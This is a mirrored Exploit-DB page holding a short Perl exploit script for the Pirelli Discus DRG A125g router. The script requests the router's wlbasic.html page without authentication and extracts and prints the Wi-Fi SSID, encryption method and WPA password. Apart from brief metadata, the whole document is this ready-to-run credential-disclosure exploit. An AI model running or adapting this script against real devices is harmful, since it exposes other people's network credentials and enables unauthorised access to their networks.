Pirelli Discus DRG A125g – Local Password Disclosure - 体验盒子

作者： Sebastián Magof

日期： 2013-11-24

类别：

webapps

平台：

hardware

来源：https://www.exploit-db.com/exploits/29795/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

#!/usr/bin/perl

#Author: Sebastián Magof

#Hardware: pirelli discus DRG A125g

#Vulnerable file: wlbasic.html

#Bug: Wifi Password Disclosure

#Type: Local

# (\/)

# (**) ±lpha

#(")(")

#usage:perl exploit.pl

use LWP::UserAgent;

use HTTP::Request;

#begin

print "\n\n************************************************************\n";

print "*Pirelli Discus ADSL DRG A125g Wifi password disclosure*\n";

print "************************************************************\n\n";

#wifi pwd disclosure file

my $url = "http://10.0.0.2/wlbasic.html";

#UserAgent

my $ua = LWP::UserAgent->new();

$ua->agent("Mozilla/5.0");

#Request.

my $req = HTTP::Request->new(GET => $url);

my $request = $ua->request($req);

my $content = $request->content(); #content

my ($ssi) = $content =~ m/ssid = '(.+)'/;

my ($pwd) = $content =~ m/wpaPskKey = '(.+)'/;

my ($enc) = $content =~ m/var wpa = '(.+)'/;

#ssid+encryption method+pwd;

print "Ssid: $ssi\n";

print "Encryption method: $enc\n";

print "Password: $pwd\n\n";

exit(0);

__EOF__